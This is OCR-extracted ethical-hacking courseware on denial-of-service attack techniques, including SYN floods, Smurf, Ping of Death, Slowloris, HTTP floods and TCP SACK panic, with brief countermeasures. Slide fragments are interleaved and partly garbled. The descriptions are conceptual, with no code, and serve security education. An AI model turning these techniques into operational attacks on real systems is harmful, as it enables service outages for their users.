DoS/DDoS Attack Techniques Attackers implement various techniques to launch denial-of-service (DoS)/distributed denial-ofservice (DDoS) attacks on target computers or networks. This section discusses the basic categories of DoS/DDoS attack vectors, various attack techniques, and various DoS/DDoS attack tools used to take over a single or multiple network system to exhaust their computing resources or render them unavailable to their intended users.
Module 10 Page 1433
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Hacking and Countermeasures
Ethical
Exam 312-50 Certified Ethical Hacker
Denial-of-Service
Basic Categories of DoS/DDoS Attack Vectors Volumetric Attacks ‘@
Consume the bandwidth of a target network or service
@ The magnitude of attack is measured in bits-per-second (bps) |@ Types of bandwidth depletion attacks: @ Flood attacks © Amplification attacks Attack Techniques © UDP flood attack © ICMPflood attack © Ping of Death and Smurf attack © Pulse wave and zero-day attack
Protocol Attacks
@ Consume other types of resources
like connection state tables present in network infrastructure
components such as load-balancers, firewalls, and application servers The magnitude of attackis measured in packets-per-second (pps)
Attack Techniques © SYN flood attack © Fragmentationattack © Spoofed session flood attack © ACK flood attack © TCPSACK panic attack
CE H
Application Layer Attacks @ Consume the resourcesor services of an application,
thereby making the application unavailableto other legitimate users @ The magnitude of attackis measured in requests-persecond (rps)
Attack Techniques © HTTPGET/POSTattack © Slowloris attack © UDP application layer flood attack © DDoS extortion attack
Basic Categories of DoS/DDoS Attack Vectors DDoS attacks mainly aim to diminish the network bandwidth by exhausting network, application, or service resources, thereby restricting legitimate users from accessing system or network resources. In general, DoS/DDoS attack vectors are categorized as follows:
=
Volumetric Attacks These attacks exhaust the bandwidth either within the target network/service or between the target network/service and the rest of the Internet to cause traffic blockage, preventing access to legitimate users. The attack magnitude is measured in bits per second (bps). Volumetric DDoS attacks generally target protocols such as the Network Time Protocol (NTP), Domain Name System (DNS), and Simple Service Discovery Protocol (SSDP), which are stateless and do not have built-in congestion avoidance features. The generation of a large number of packets can cause the consumption of the entire bandwidth on the network. A single machine cannot make enough requests to overwhelm network equipment. Hence, in DDoS attacks, the attacker uses several computers to flood a victim. In this case, the attacker can control all the machines and instruct them to direct traffic to the target system. DDoS attacks flood a network, causing a significant statistical change in network traffic that overwhelms network equipment such as switches and routers. Attackers use the processing power of a large number of geographically distributed machines to generate huge traffic directed at the victim, which is why such an attack is called a DDoS attack.
Module 10 Page 1434
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
There are two types of bandwidth depletion attacks: o
Ina flood attack, zombies send large volumes of traffic to the victim’s systems to exhaust the bandwidth of these systems.
o
Inanamplification attack, the attacker or zombies transfer messages to a broadcast IP address. This method amplifies malicious traffic that consumes the bandwidth of the victim’s systems.
Attackers use botnets and perform DDoS attacks by flooding the network. The entire bandwidth is used up by attackers, and no bandwidth remains for legitimate use. The following are examples for volumetric attack techniques:
=
o
User Datagram Protocol (UDP) flood attack
o
Internet Control Message Protocol (ICMP) flood attack
o
Ping of Death (PoD) attack
o
Smurf attack
o
Pulse wave attack
o
Zero-day attack
o
Malformed IP packet flood attack
©
Spoofed IP packet flood attack
Protocol Attacks Attackers can also prevent access to a target by consuming types of resources other than bandwidth, such as connection state tables. Protocol DDoS attacks exhaust resources available on the target or on a specific device between the target and the Internet. These attacks consume the connection state tables present in network infrastructure devices such as load balancers, firewalls, and application servers. Consequently, no new connections will be allowed, because the device will be waiting for existing connections to close or expire. In this case, the attack magnitude is measured in packets per second (pps) or connections per second (cps). These attacks can even take over the state of millions of connections maintained by high-capacity devices. The following are examples for protocol attack techniques: o
Synchronize (SYN) flood attack
o
ACK and PUSH ACK flood attack
o
Fragmentation attack
o
TCP connection flood attack
©
Spoofed session flood attack
o
TCP state exhaustion attack
o
Acknowledgement (ACK) flood attack
o
RST attack
o
TCP SACK panic attack
o
SYN-ACK flood attack
Module 10 Page 1435
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Application Layer Attacks In these attacks, the attacker attempts to exploit vulnerabilities in the application layer protocol or in the application itself to prevent legitimate users from accessing the application. Attacks on unpatched, vulnerable systems do not require as much bandwidth as protocol or volumetric DDoS attacks for succeeding. In application DDoS attacks, the application layer or application resources are consumed by opening connections and leaving them open until no new connections can be made. These attacks destroy a specific aspect of an application or service and can be effective with one or a few attacking machines that produce a low traffic rate. Furthermore, these attacks are very difficult to detect and mitigate. The magnitude of attack is measured in requests per second (rps). Application-level flood attacks result in the loss of services of a particular network, such as emails and network resources, or the temporary shutdown of applications and services. Through this attack, attackers exploit weaknesses in programming source code to prevent the application from processing legitimate requests. Several kinds of DoS attacks rely on software-related exploits such as buffer overflows. A buffer overflow attack sends excessive data to an application that either shuts down the application or forces the data sent to the application to run on the host system. The attack crashes a vulnerable system remotely by sending excessive traffic to an application. Occasionally, attackers can also execute arbitrary code on the remote system via a buffer overflow. Sending too much data to an application overwrites the data that controls the program, enabling the hacker to run their code instead. Using application-level flood attacks, attackers attempt to do the following: o
Flood web applications with legitimate user traffic
o
Disrupt service to a specific system or person access through repeated invalid login attempts
o
Jam the application database Language (SQL) queries
connection
by, for example,
blocking a user’s
by crafting malicious Structured
Query
Application-level flood attacks can result in a substantial loss of money, service, and reputation for organizations. These attacks occur after the establishment of a connection. Because a connection is established and the traffic entering the target appears to be legitimate, it is difficult to detect these attacks. However, if the user identifies the attack, they can stop it and trace it back to its source more easily than other types of DDoS attacks. The following are examples for application layer attack techniques: o
Hypertext Transfer Protocol (HTTP) flood attack
o
Slowloris attack
Module 10 Page 1436
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service o
UDP application layer flood attack
o
DDoS extortion attack
Exam 312-50 Certified Ethical Hacker
DoS/DDoS Attack Techniques Next, the following DoS/DDoS attack techniques will be discussed: UDP flood attack
HTTPS GET/POST attack
ICMP flood attack
Slowloris attack
PoD attack
UDP application layer flood attack
Smurf attack
=
Multi-vector attack
Pulse wave attack
=
Peer-to-peer attack
Zero-day attack
=
Permanent DoS (PDoS) attack
SYN flood attack
Distributed reflection DoS (DRDoS) attack
Fragmentation attack ACK flood attack TCP state exhaustion attack
TCP SACK panic attack DDoS extortion attack
Spoofed session flood attack
Module 10 Page 1437
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
UDP Flood Attack
CE H
@ Anattacker sends spoofed UDP packets at a very high
A>...
packet rate to a remote host on random ports of a
i a large source IP range target server using
sends sess or poe‘he attacker er sere and random destination UDP ports
|
TaptSener -
|@ The flooding of UDP packets causes the server to repeatedly check for non-existent applications at the ports
upp Packet ‘@
Legitimate applications are inaccessible by the system
UDP Packet
and give an error reply with an ICMP “Destination Unreachable” packet
ICMP error
Paced
@ This attack consumes network resources and available
bandwidth, exhaustingthe network until it goes offline
v
unreachable
vo
UDP Flood Attack In a UDP flood attack, an attacker sends spoofed UDP packets at a very high packet rate to a remote host on random ports of a target server by using a large source IP range. The flooding of UDP packets causes the server to check repeatedly for nonexistent applications at the ports. Consequently, legitimate applications become inaccessible by the system, and any attempts to access them return an error reply with an ICMP “Destination Unreachable” packet. This attack consumes network resources and available bandwidth, exhausting the network until it goes offline.
The attacker sends
{|
UDP packets with spoofed IP address and random destination UDP ports
fa
Target Server
UDP Packet UDP Packet
UDP Packet
ICMP error packets of destination unreachable Figure 10.10: UDP flood attack
Module 10 Page 1438
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
ICMP Flood Attack
CE H
@
|@ Network administrators use ICMP primarily for IP operations and troubleshooting, and error messaging is used for undeliverable packets
‘The attacker sends ICMP ECHO requests with spoofed source addresses
Target Server
@ ICMP flood attacks are a type of attackin which attackers send
large volumes of ICMP echo request packets toa victim system
directly or through reflection networks
|@ These packets signal the victim's system to reply, and the resulting combination of traffic saturates the bandwidth of the victim's network connection, causing it to be overwhelmed and
4 -Maximum limit of ICMP ECHO requests per second- | ECHO Request
subsequently stop responding to legitimate TCP/IP requests
@ To protect against ICMP flood attacks, set a threshold limit that invokes an ICMP flood attack protection feature when
exceeded
~~
Legitimate ICMP ECHO request from
‘an address in the same security zone
ICMP Flood Attack Network administrators use ICMP primarily for IP operations, troubleshooting, and error messaging for undeliverable packets. In this attack, attackers send large volumes of ICMP echo request packets to a victim’s system directly or through reflection networks. These packets signal the victim’s system to reply, and the large traffic saturates the bandwidth of the victim’s network connection, causing it to be overwhelmed and subsequently stop responding to legitimate TCP/IP requests. To protect against ICMP flood attacks, it is necessary to set a threshold that invokes the ICMP flood attack protection feature when exceeded. When the ICMP threshold is exceeded (by default, the threshold value is 1000 packets/s), the router rejects further ICMP echo requests from all addresses in the same security zone for the remainder of the current second as well as
the next second.
Module 10 Page 1439
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
The attacker sends ICMP ECHO
Target Server
requests with spoofed source addresses
ECHO Request ECHO Repl ECHO Request ECHO Reply
-Maximum limit of ICMP ECHO requests per secondECHO Ri
ECHO
t
Request
Legitimate ICMP ECHO request from
an address in the same security zone Figure 10.11: ICMP flood attack
Module 10 Page 1440
Ethical Hacking and Countermeasures Copyright © by EC-Council
All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Ping of Death and Smurf Attacks
CE H
Ping of Death Attack
Smurf Attack
@ Ina Ping of Death (PoD) attack, an attacker tries to crash, destabilize, or freeze the targeted system or service by sending malformed or oversized packets usinga simple ping command @ For instance,the attacker sends a packet which hasa size of 65,538 bytes to the target web server. This packet size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process of the receiving
@ Ina Smurf attack, the attacker spoofs the source IP address with the victim's IP address and sends a large number of ICMP ECHO request packets to an IP broadcastnetwork @ This causes all the hosts on the broadcastnetworkto respondto the received ICMP ECHO requests. These responses will be sent to the victim machine, ultimately causing the machineto crash
system might cause the system to crash
Target Server
Ping of Death Attack In a Ping of Death (PoD) attack, an attacker attempts to crash, destabilize, or freeze the target system or service by sending malformed or oversized packets using a simple ping command. Suppose an attacker sends a packet with a size of 65,538 bytes to the target web server. This size exceeds the size limit prescribed by RFC 791 IP, which is 65,535 bytes. The reassembly process performed by the receiving system might cause the system to crash. In such attacks, the attacker’s identity can be easily spoofed, and the attacker might not need detailed knowledge of the target machine, except its IP address. 20 Bytes
8 Bytes
IP HEADER
ICMP. HEADER
PPP
ert
65,510 Bytes (anPDE ves
Attacker
> ———]
®
Target Server Figure 10.12: Ping-of-death attack
Smurf Attack In a Smurf attack, the attacker spoofs the source IP address with the victim’s IP address and sends a large number of ICMP ECHO request packets to an IP broadcast network. This causes all the hosts on the broadcast network to respond to the received ICMP ECHO requests. These responses are sent to the victim’s machine because the IP address was spoofed by the attacker, causing significant traffic to the victim’s machine and ultimately making it crash.
Module 10 Page 1441
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
IP Broadcast Network Figure 10.13: Smurf attack
Module 10 Page 1442
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Pulse Wave and Zero-Day DDoS Attacks Pulse Wave DDoS Attack
Zero-Day DDoS Attack
@ Ina pulse wave DDoS attack, attackers send a highly repetitive,
@
10 minutes, and each specific attack session can last for a few hoursto days @ A single pulse (300 Gbps or more) is sufficientto crowd a
@
periodic train of packets as pulses to the target victim every
Bandwidth —>
network pipe
@
400 Gts|
|
Azero-day DDoS attack is delivered before the DDoS vulnerabilities of a system have been patched or effective defensive mechanisms are implemented Until the victim deploys a patch for the exploited DDoS vulnerability, an attacker can actively block all the victim's resources and steal the victim’s data These attacks can cause severe damage to the victim’s network infrastructure and assets
300 Gb 200 Gb 100 Gbes 10:00
obps!
Pulse Wave DDoS Attack
Bandwidth ——»>
Pulse wave DDoS attacks are the latest type of DDoS attacks employed by threat actors to disrupt the standard operations of targets. Generally, DDoS attack patterns are continuous incoming traffic flows. However, in pulse wave DDoS attacks, the attack pattern is periodic, and the attack is huge, consuming the entire bandwidth of target networks. Attackers send a highly repetitive strain of packets as pulses to the target victim every 10 min, and the attack session lasts for approximately an hour or some days. A single pulse (300 Gbps or more) is more than enough to crowd a network pipe. Recovery from such attacks is very difficult and occasionally impossible.
400 Gbps 300 Gbps| 200 Gbps| 100 Gbps
10:00
O Gbps.
Figure 10.14: Pulse wave DDoS attack
Module 10 Page 1443
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Zero-Day DDoS Attack Zero-day DDoS attacks are attacks in which DDoS vulnerabilities do not have patches or effective defensive mechanisms. Until the victim identifies the threat actor’s attack strategy and deploys a patch for the exploited DDoS vulnerability, the attacker actively blocks all the victim’s resources and steals the victim’s data. These attacks can cause severe damage to the victim’s network infrastructure and assets. Currently, there is no versatile approach to protect networks from this type of attack.
Module 10 Page 1444
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
SYN Flood Attack
CE H
@ The attacker sends a large number of SYN requests with fake source IP addresses to the target server (victim)
‘@ The target machine sends back a SYN/ACKin response to the request
and waits for the ACK to complete the session setup
@ The target machine does not get the response because the source address is fake |@ SYN flooding takes advantage of a flaw in the implementation of the TCP three-way handshake in most hosts |@ When Host B receives the SYN request from Host A, it must keep track of the partially opened connection in a "listen queue" for at least 75 seconds @ Amalicious host can exploit the small size of the listen queue by sending multiple SYN requests to a host, but never replying to the
1
os
Normal connection
stablshment
|
SYN/ACK
@ The victim's listen queue is quickly filled up @ The ability to delay each incomplete connection for 75 seconds can be used cumulatively as a Denial-of-Service attack
SYN Flood Attack In a SYN attack, the attacker sends a large number of SYN requests to the target server (victim) with fake source IP addresses. The attack creates incomplete TCP connections that use up network resources. Normally, when a client wants to begin a TCP connection to a server, the client and server exchange the following series of messages: =
ATCP SYN request packet is sent to a server.
=
The server sends a SYN/ACK (acknowledgement) in response to the request.
=
The client sends a response ACK to the server to complete the session setup.
This method is a “three-way handshake.” In a SYN attack, the attacker exploits the three-way handshake method. First, the attacker sends a fake TCP SYN request to the target server. After the server sends a SYN/ACK in response to the client’s (attacker’s) request, the client never sends an ACK response. This leaves the server waiting to complete the connection. SYN flooding takes advantage of the flawed manner in which most hosts implement the TCP three-way handshake. This attack occurs when the attacker sends unlimited SYN packets (requests) to the host system. The process of transmitting such packets is faster than the system can handle. Normally, a connection is established with the TCP three-way handshake. The host keeps track of partially open connections while waiting for response ACK packets in a listening queue. As shown in the figure, when Host B receives a SYN request from Host A, it must keep track of the partially opened connection in a “listen queue” for at least 75 s.
Module 10 Page 1445
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Denial-of-Service
ca ae
Host A
Host B
Normal connection establishment
Figure 10.15: SYN flood attack
A malicious host can exploit another host, managing many partial connections by sending many SYN requests to the target host simultaneously. When the queue is full, the system cannot open new connections until it drops some entries from the connection queue through handshake timeouts. This ability to hold up each incomplete connection for 75 s can be cumulatively exploited in a DoS attack. The attack uses fake IP addresses, making it difficult to trace the source. An attacker can fill a table of connections even without spoofing the source IP address. In addition to SYN flood attacks, attackers can also employ SYN-ACK and ACK/PUSH ACK flood attacks to disrupt target machines. All these attacks are similar in functionality with minor variations.
SYN-ACK Flood Attack This type of attack is similar to the SYN flood attack, except that in this type of flood attack, the attacker exploits the second stage of a three-way handshake by sending a large number of SYNACK packets to the target machine to exhaust its resources. ACK and PUSH ACK Flood Attack During an active TCP session, ACK and PUSH ACK are the flags used to transfer information to and from the server and client machines till the session ends. In an ACK and PUSH ACK flood attack, attackers send a large amount of spoofed ACK and PUSH ACK packets to the target machine, making it non-functional.
Module 10 Page 1446
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Countermeasures for SYN Flood Attacks Proper packet filtering is a viable solution to SYN flood attacks. An administrator can also tune the TCP/IP stack to reduce the impact of SYN attacks while allowing legitimate client traffic. Some SYN attacks do not attempt to upset servers; instead, they attempt to consume the entire bandwidth of the Internet connection. Two tools to counter this attack are SYN cookies and SynAttackProtect. To guard against an attacker attempting to consume the bandwidth of an Internet connection, an administrator can implement some additional safety measures; for example, they can decrease the time-out period in which a pending connection is maintained in the “SYN RECEIVED” state in the queue. Normally, if a client sends no response ACK, a server will retransmit the first ACK packet. This vulnerability can be removed by decreasing the time of the first packet’s retransmission, decreasing the number of packet retransmissions, or turning off packet retransmissions entirely.
Module 10 Page 1447
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures
Exam 312-50 Certified Ethical Hacker
Denial-of-Service
Fragmentation Attack
CE H
|@ These attacks stop a victim from being able to re-assemble fragmented packets by flooding the target system with TCP or UDP fragments, resulting in reduced performance. Attackers send a large number of fragmented (1500+ byte) packets to a target web server with a relatively small packet rate |@ Because the protocol allows for fragmentation, these packets usually pass uninspected through network equipment such as routers, firewalls, and IDS/IPS |@ Reassemblingand inspecting these large fragmented packets consumes excessive resources. Moreover, the contentin the packet fragments will be randomized by the attacker, which in turn makes the process consume more resources, causing the system to crash
——————
—— Fragment2 —>
Figure 10.16: Fragmentation attack
Module 10 Page 1448
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Spoofed Session Flood Attack
C E H
@ Attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets
’
.
@ Attackers employ this attack to bypass firewalls and perform DDoS attacks against the target network, exhausting its network resources
@ Attackers create a fake session with multiple SYN and multiple ACK packets along with one or more RST or FIN packets
Multiple ACK Spoofed Session Flood Attack
FAH
Multiple SYN-ACK Spoofed Session Flood Attack
|@ Attackers create a fake session by completely skipping the SYN packets and using only multiple ACK packets along with one or more RST or FIN packets
Copyright © by
Spoofed Session Flood Attack In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets. Attackers employ this attack to bypass firewalls and perform DDoS attacks against target networks, exhausting their network resources. The following are examples for spoofed session flood attacks:
=
Multiple SYN-ACK Spoofed Session Flood Attack In this type of flood attack, attackers create a fake session with multiple ACK packets, along with one or more RST or FIN packets.
=
multiple
SYN
and
Multiple ACK Spoofed Session Flood Attack In this type of flood attack, attackers create a fake session by completely skipping SYN packets and using only multiple ACK packets along with one or more RST or FIN packets.
Because SYN packets are not employed and firewalls mostly use SYN packet filters to detect abnormal
traffic, the DDoS
detection
rate of the firewalls is very low for these
types of attacks.
Module 10 Page 1449
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
HTTP GET/POST HTTP @
GET/POST
and Slowloris Attacks Attack
Slowloris Attack
HTTP clients such as web browsers connect to a web server
@
through the HTTP protocol to send HTTP requests. These requests can be either HTTP GET or HTTP POST @ InanHTTP GET attack, attackers use a time-delayed HTTP header to maintain HTTP connections and exhaust web server resources @
InanHTTP
to the target web server or application
multiple open connections and keeps waiting for the requests to complete @ These requests will not be complete,and as a result, the target server's maximum concurrent connection pool will be exhausted, and additional connection attempts will be denied
complete headers but with incomplete message bodies to the target web server or application, prompting the server to wait for the rest of the message body |
|] |]
Normal HTTP request-response connection
]
with time-delayed “ BK Target server waiting for complete header
HTTP POST Attack ]
In the Slowloris attack, the attacker sends partial HTTP requests
‘@ Upon receiving the partial HTTP requests, the target server opens
POST attack, attackers send HTTP requests with
HTTP GET Attack
CE H
Target server waitingfor message body
] ]
|]
Slowloris DDoS attack
response
|
HTTP GET/POST Attack HTTP attacks are layer-7 attacks. HTTP clients, such as web browsers, connect to a web server through HTTP to send HTTP requests, which can be either HTTP GET or HTTP POST. Attackers exploit these requests to perform DoS attacks. In an HTTP GET attack, the attacker uses a time-delayed HTTP header to hold on to an HTTP connection and exhaust web-server resources. The attacker never sends the full request to the target server. Consequently, the server retains the HTTP connection and waits, making it inaccessible for legitimate users. In these types of attacks, all the network parameters appear healthy while the service remains unavailable. In an HTTP POST attack, the attacker sends HTTP requests with complete headers but an incomplete message body to the target web server or application. Because the message body is incomplete, the server waits for the rest of the body, making the web server or web application unavailable to legitimate users. An HTTP GET/POST attack is a sophisticated layer-7 attack that does not use malformed packets, spoofing, or reflection techniques. This type of attack requires less bandwidth than other attacks to bring down the targeted site or web server. This attack aims to compel the server to allocate as many resources as possible to serve the attack, thereby denying legitimate
users access to the server’s resources.
Module 10 Page 1450
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
HTTP GET Attack Request with time-delayed HTTP header
Target server waiting for complete header
Attacker
HTTP POST Attack Request with incomplete message body
Target server waiting for message body
Attacker
Figure 10.17: HTTP GET/POST attack
In addition to the aforementioned HTTP GET/POST attack, attackers can employ the following HTTP flood attacks to exhaust the target network’s bandwidth: =
Single-Session HTTP Flood Attack In this type of flood attack, an attacker exploits the vulnerabilities bombard a target with multiple requests in a single HTTP session.
=
in HTTP
1.1 to
Single-Request HTTP Flood Attack In this type of flood attack, attackers make several HTTP requests from a single HTTP session by masking these requests within one HTTP packet. This technique allows attackers to be anonymous and invisible while performing DDoS attacks.
=
Recursive HTTP GET Flood Attack Staying undetected is key for attackers. An attacker posing as a legitimate user and performing legitimate actions can trick any firewall into believing that the source is legitimate while it is not. Recursive GET collects a list of pages or images and appears to be going through these pages or images. However, it stealthily performs flooding attacks on the target. The recursive GET in combination with an HTTP flood attack can cause extreme damage to the target.
=
Random Recursive GET Flood Attack This type of attack is a tweaked version of the recursive GET flood attack. It is designed for forums, blogs, and other websites that have pages in a sequence. Similar to the recursive GET flood attack, in this attack, the recursive GET pretends to be going through pages. Because the targets are forums, groups, and other blogs, the attacker uses random numbers from a valid page range to pose as a legitimate user and sends a new GET request each time. In both recursive GET and random recursive GET flood attacks, the target is bombarded with a large number of GET requests, exhausting its
resources.
Module 10 Page 1451
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Slowloris Attack Slowloris is a DDoS attack tool used to perform layer-7 DDoS attacks to take down web infrastructure. It is distinctly different from other tools in that it uses perfectly legitimate HTTP traffic to take down a target server. In Slowloris attacks, the attacker sends partial HTTP requests to the target web server or application. Upon receiving the partial requests, the target server opens multiple connections and waits for the requests to complete. However, these requests remain incomplete, causing the target server’s maximum concurrent connection pool to be filled up and additional connection attempts to be denied. Normal HTTP request-response connection
AA:
HTTP request
HTTP response
Slowloris DDoS attack HTTP
t
Figure 10.18: Slowloris attack
Module 10 Page 1452
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
UDP Application Layer Flood Attack
CE H
|@ Some of the UDP-based application layer protocols that attackers can employ for flooding the target networks include:
NTP
|
Quake Network Protocol Steam Protocol
|
VoIP
|
Copyright © by
UDP Application Layer Flood Attack Though UDP flood attacks are known for their volumetric attack nature, some application layer protocols that rely on UDP can be employed by attackers to perform flood attacks on target networks. The following are examples for UDP-based employ for flooding target networks:
application
layer
protocols
that
attackers
can
=
Character Generator Protocol
=
Trivial File Transfer Protocol (TFTP)
=
=
(CHARGEN) Simple Network Management Protocol Version 2 (SNMPv2)
Network Basic Input/Output System (NetBIOS)
=
NTP
=
Quake Network Protocol
=
Steam Protocol
=
Voice over Internet Protocol (VoIP)
=
Quote of the Day (QOTD)
=
Remote procedure call (RPC)
=
SSDP
=
Connection-less Lightweight Directory Access Protocol (CLDAP)
Module 10 Page 1453
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Multi-Vector Attack
CE H
@ In multi-vector DDoS attacks, the attackers use combinations of volumetric, protocol, and application-layer attacks to disable the target system or service
|@ Attackers rapidly and repeatedly change the form of their DDoS attack (e.g., SYN packets, Layer 7) |@ These attacks are either launched one vector at a time or in parallel to confuse a company’s IT department and exhaust their resources with their focus diverted to the wrong solution Volumetric
Multi-Vector attack
Protocol
in sequence
Attacker
Multi-Vector attack in parallel
Multi-Vector Attack In multi-vector DDoS attacks, the attacker uses combinations of volumetric, protocol, and application layer attacks to take down the target system or service. The attacker quickly changes from one form of DDoS attack (e.g., SYN packets) to another (layer 7). These attacks are either launched through one vector at a time or through multiple vectors in parallel to confuse a company’s IT department, making them spend all their resources and maliciously diverting their focus. Volumetric
Attack
Multi-Vector attack
oe
in sequence
Protocol
Attack
aoe
Application
Attacker
Victim Volumetric Attack susecesesscensssensssesesssses>
Multi-Vector attack
Protocol Attack
in parallel
Attacker
Ee Layer Attack eee Sesseesesesses>
Victim
Figure 10.19: Multi-vector attack
Module 10 Page 1454
Ethical Hacking and Countermeasures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Peer-to-Peer Attack
CE H
@ Using peer-to-peer attacks, attackers instruct clients of peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and to connect to the victim's fake website @ Attackers exploit flaws found in the network using the DC++ (Direct Connect) protocol, which is used for sharingall types of files between instant messaging clients @
Using this
method,
attackers launch massive denial-of-service attacks and compromise websites
Peer-to-Peer Attack A peer-to-peer attack is a form of DDoS attack in which the attacker exploits a number of bugs in peer-to-peer servers to initiate a DDoS attack. Attackers exploit flaws found in networks that use the Direct Connect (DC++) protocol, which allows the exchange of files between instantmessaging clients. This kind of attack does not use botnets. Unlike a botnet-based attack, a peer-to-peer attack eliminates the need for attackers to communicate with the clients they subvert. Here, the attacker instructs clients of large peer-to-peer file sharing hubs to disconnect from their peer-to-peer network and instead connect to the victim’s website. Consequently, several thousand computers may aggressively attempt to connect to a target website, causing a drop in the performance of the target website. It is easy to identify peer-to-peer attacks based on signatures. By using this method, attackers launch massive DoS attacks to compromise websites. Peer-to-peer DDoS attacks can be minimized by specifying ports for peer-to-peer communication. For example, specifying port 80 to disallow peer-to-peer communication minimizes the possibility of attacks on websites.
Module 10 Page 1455
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
User5.
Attack Traffic
User3. Attacker
User 1. Figure 10.20: Peer-to-peer attack
Module 10 Page 1456
Ethical Hacking and Countermeasures Copyright © by E6-Council All Rights Reserved. Reproduction is Strictly Prohibited.
Ethical Hacking and Countermeasures Denial-of-Service
Exam 312-50 Certified Ethical Hacker
Permanent Denial-of-Service Attack and TCP SACK
C IE H
Pood bth
Panic Attack
Permanent Denial-of-Service Attack
TCP SACK Panic Attack
(@
Permanent DoS, also known as phlashing, refers to attacks that cause irreversible damage to system hardware
(@
|
Unlike other Dos attacks, it sabotages the system hardware,
|@_ This attack exploits an integer overflow vulnerability
|G
This attackis carried out using a method known as “bricking a
“@ Attackers send SACK packets in sequence to the target server by setting
requiring the victim to replace or reinstall the hardware
system”
|G _ Using this method, attackers send fraudulent hardware updates to the victims
In TCP SACK panicattack, attackers attemptto crash the target Linux machine by sending SACK packets with malformed maximum segment size (MSS) Buffer (SKB), which can lead to kernel panic
MSS to the lowest value (48 bytes)
|G The socket buffer exceeds the limit and triggers integer overflow causing akernel panic that leads to denial of service
IRC chats, tweets, posts, videos Attacker
‘Attacker gets access to vic
s computer
in Linux Socket
Linux Server
Buffer overflows cause kernel panic
Victim (Malicious code is executed)
Permanent Denial-of-Service Attack Permanent DoS (PDoS) attacks, also known as phlashing, purely target hardware and cause irreversible damage to the hardware. Unlike other types of DoS attacks, it sabotages the system hardware, requiring the victim to replace or reinstall the hardware. The PDoS attack exploits security flaws in a device to allow remote administration on the management interfaces of the victim’s hardware, such as printers, routers, and other networking devices.
